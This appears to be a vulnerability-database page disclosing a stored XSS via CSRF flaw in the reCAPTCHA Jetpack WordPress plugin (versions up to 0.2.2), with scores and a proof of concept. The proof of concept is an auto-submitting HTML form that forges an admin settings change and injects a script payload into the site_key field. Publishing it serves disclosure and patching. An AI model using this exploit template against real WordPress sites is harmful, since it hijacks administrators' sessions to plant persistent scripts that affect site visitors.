Lucene search

K
wpexploitBob MatyasWPEX-ID:6E09E922-983C-4406-8053-747D839995D1
HistoryApr 19, 2024 - 12:00 a.m.

reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF

2024-04-1900:00:00
Bob Matyas
24
recaptcha jetpack update may 03 2024 exploit

5.9 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.2%

Description The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.

This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.

Add a post/page containing a Jetpack Contact Form shortcode:

```
[contact-form][contact-field label="Name" type="name"  required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```

Once there is a form using Jetpack, make a logged in admin open an HTML document containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
        <input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
        <input type="hidden" name="secret_key" value='csrf2222' />
        <input type="hidden" name="recaptcha_type" value="v2" />
        <input type="hidden" name="submit" value="Save Changes" />
        <input type="submit" name="enter" id="enter" value="Submit">
    </form>
</body>
```

View the post/page containing the form and see the XSS

5.9 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.2%

Related for WPEX-ID:6E09E922-983C-4406-8053-747D839995D1